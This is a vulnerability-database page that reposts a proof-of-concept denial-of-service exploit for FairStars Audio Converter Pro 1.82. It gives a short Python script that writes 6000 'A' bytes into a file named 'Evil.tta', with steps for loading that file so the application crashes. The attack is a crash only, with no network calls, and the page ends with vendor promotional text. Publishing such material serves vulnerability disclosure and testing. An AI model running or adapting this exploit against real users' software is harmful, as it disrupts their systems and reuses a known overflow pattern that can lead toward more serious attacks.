Lucene search
K

FairStars Audio Converter Pro 1.82 - (.tta) Denial of Service Exploit

🗓️ 25 May 2019 00:00:00Reported by AchillesType 
zdt
 zdt
🔗 0day.today👁 240 Views

FairStars Audio Converter Pro 1.82 Denial of Service Exploi

Code
# Exploit Title: FairStars Audio Converter Pro 1.82 - '.tta' Denial of Service (PoC)
# Date: 25.5.2019
# Vendor Homepage:http://www.fairstars.com/
# Software Link:  http://www.fairstars.com/download/facp_setup.exe
# Exploit Author: Achilles
# Tested Version: 1.82
# Tested on: Windows 7 x64 Sp1
#            Windows XP Sp3

# 1.- Run the python script, it will create a new file with the name "Evil.tta"
# 2.- Open AudioConverterPro.exe and Click Add
# 3.- Load the file "Evil.tta"
# 4.- Click ok
# 5.- And you will see a crash.



#!/usr/bin/env python
buffer = "\x41" * 6000

try:
	f=open("Evil.tta","w")
	print "[+] Creating %s bytes evil payload.." %len(buffer)
	f.write(buffer)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 May 2019 00:00Current
0.2Low risk
Vulners AI Score0.2
240